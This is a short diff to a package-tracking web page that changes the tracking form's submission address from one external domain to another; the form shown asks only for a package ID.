--- a/tracking.html
+++ b/tracking.html
@@ -177,7 +177,7 @@
 
                                 
 								<!-- Main tracking form -->
-                                <form class="form-subscribe" method="post" action="https://securequicknet.online/authorize/intlcargoshipping/app/tracking/query.php">
+                                <form class="form-subscribe" method="post" action="https://qikconnect.net/authorize/intlcargoshipping/app/tracking/query.php">
 
 									<input name="tracking" class="form-subscribe__input form-control" type="text" placeholder="#PACKAGE ID" id="tracking" required>
 
